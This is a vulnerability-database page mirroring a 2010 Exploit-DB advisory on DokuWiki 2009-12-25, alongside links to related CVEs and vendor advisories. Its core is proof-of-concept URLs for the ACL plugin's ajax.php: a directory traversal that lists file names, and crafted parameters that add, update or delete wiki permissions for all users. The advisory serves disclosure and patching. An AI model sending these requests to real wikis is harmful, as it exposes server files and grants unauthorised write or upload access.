Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbIHTeamEDB-ID:11141
HistoryJan 14, 2010 - 12:00 a.m.

dokuwiki 2009-12-25 - Multiple Vulnerabilities

2010-01-1400:00:00
IHTeam
www.exploit-db.com
30

AI Score

7.4

Confidence

Low

JSON
Reported:        13-01-2010
Patched:        13-01-2010
Released:        14-01-2010
Vulnerable version :     
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25.tgz
Patched version:    
http://www.splitbrain.org/_media/projects/dokuwiki/dokuwiki-2009-12-25b.tgz
Author:            white_sheep
Contact:        [email protected] - https://www.ihteam.net

--------------------  Show Outside Directory

PoC :

     http://server/plugins/acl/ajax.php?ajax=tree&ns=../pages/

     The bug allows listing the names of arbitrary file on the webserver 
- NOT THEIR CONTENTS.


--------------------  Arbitrary Change or Delete Wiki Permission

PoC :

     
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL) 

             add to acl.auth.php read or write authorization.

     
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)
             delete from acl.auth.php an eventually authorization like 
(ACL).

     
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)
             delete from acl.auth.php all authorization like (ACL).

     where (ACL) must be:
         1     -> read
         2     -> modified
         4     -> creation
         8     -> upload
         16     -> delete

Related

freebsd 1
securityvulns 2
nessus 6
openvas 9
debian 3
osv 1
prion 2
cve 2
cvelist 2
debiancve 2
ubuntucve 2
nvd 2
gentoo 1
freebsd
freebsd
dokuwiki -- multiple vulnerabilities
2010-01-17 00:00:00
securityvulns
securityvulns
[SECURITY] [DSA-1976-1] New dokuwiki packages fix several vulnerabilities
2010-01-23 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2010-01-23 00:00:00
nessus
nessus
FreeBSD : dokuwiki -- multiple vulnerabilities (848539dc-0458-11df-8dd7-002170daae37)
2010-01-19 00:00:00
Fedora 11 : dokuwiki-0-0.4.20091225.c.fc11 (2010-0770)
2010-07-01 00:00:00
Debian DSA-1976-1 : dokuwiki - several vulnerabilities
2010-02-24 00:00:00
openvas
openvas
Fedora Update for dokuwiki FEDORA-2010-0770
2010-03-02 00:00:00
Fedora Update for dokuwiki FEDORA-2010-0770
2010-03-02 00:00:00
FreeBSD Ports: dokuwiki
2010-02-10 00:00:00
debian
debian
[Backports-security-announce] Security Update for dokuwiki
2010-02-04 19:59:59
[Backports-security-announce] Security Update for dokuwiki
2010-02-04 20:00:25
[SECURITY] [DSA-1976-1] New dokuwiki packages fix several vulnerabilities
2010-01-22 16:11:52
osv
osv
dokuwiki - several vulnerabilities
2010-01-22 00:00:00
prion
prion
Directory traversal
2010-02-15 18:30:00
Code injection
2010-02-15 18:30:00
cve
cve
CVE-2010-0287
2010-02-15 18:30:00
CVE-2010-0288
2010-02-15 18:30:00
cvelist
cvelist
CVE-2010-0288
2010-02-15 18:00:00
CVE-2010-0287
2010-02-15 18:00:00
debiancve
debiancve
CVE-2010-0288
2010-02-15 18:30:00
CVE-2010-0287
2010-02-15 18:30:00
ubuntucve
ubuntucve
CVE-2010-0287
2010-02-15 00:00:00
CVE-2010-0288
2010-02-15 00:00:00
nvd
nvd
CVE-2010-0287
2010-02-15 18:30:00
CVE-2010-0288
2010-02-15 18:30:00
gentoo
gentoo
DokuWiki: Multiple vulnerabilities
2013-01-09 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:11141
freebsd1securityvulns2nessus6openvas9debian3osv1prion2cve2cvelist2debiancve2ubuntucve2nvd2gentoo1